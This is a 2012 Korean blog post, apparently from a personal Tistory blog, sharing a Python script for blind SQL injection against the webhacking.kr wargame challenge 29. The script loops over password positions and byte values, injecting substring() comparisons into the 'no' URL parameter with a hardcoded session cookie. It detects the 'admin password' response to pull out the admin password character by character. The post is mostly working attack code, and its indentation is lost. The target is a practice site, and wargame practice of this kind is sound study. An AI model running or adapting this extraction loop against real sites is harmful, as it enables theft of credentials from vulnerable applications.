2012. 7. 12. 03:23

[ python ] webhacking.kr를 위한 본 파이썬 블라인드 인젝터 코드 (컬럼명을 알았을 시)

Python

import urllib.request

import re


#url_head = "http://webhacking.kr/challenge/web/web-29/index.php?no=2i%7c%7csubstring(id,1,1)=0x61"

e=1

while 1 :

url_head = "http://webhacking.kr/challenge/web/web-29/index.php?no=2%7c%7csubstring(id,1,1)=0x61%26%26substring(pw,"+str(e)+",1)=0x"

url_tail = "&id=guest&pw=guest"

cookie='PHPSESSID=0e8d276d5b26e1bae81c9e839f5659aa; notice=yes'

headers = {'Cookie':cookie}

z=1

while 1:  

url = url_head + str(z) + url_tail

req = urllib.request.Request(url, None, headers)

res = urllib.request.urlopen(req)

html = str(res.read())

# print(html)

# if re.findall('Failure',html):

if re.findall('admin password',html):

print(str(e)+":"+str(z))

break

if (z>255):

print(str(e)+"is empty")

break

z+=1

e+=1

print("----------------------------------------");

저작자표시 비영리 변경금지

'Python' 카테고리의 다른 글

[ python ] LIST 미리 선언해주기  (0) 2012.07.16
[ python ] 파일을 뒤에서 부터 불러오고 싶을 때.. seek 오류관련  (0) 2012.07.16
[python 3.2 ] FTP 관련 python 코드  (0) 2012.07.11
[python 3.2 ] socket Server Client 예제 코드  (0) 2012.07.11
python try catch 사용하기 (using try,catch in python)  (0) 2012.07.02
Posted by k1rha

티스토리툴바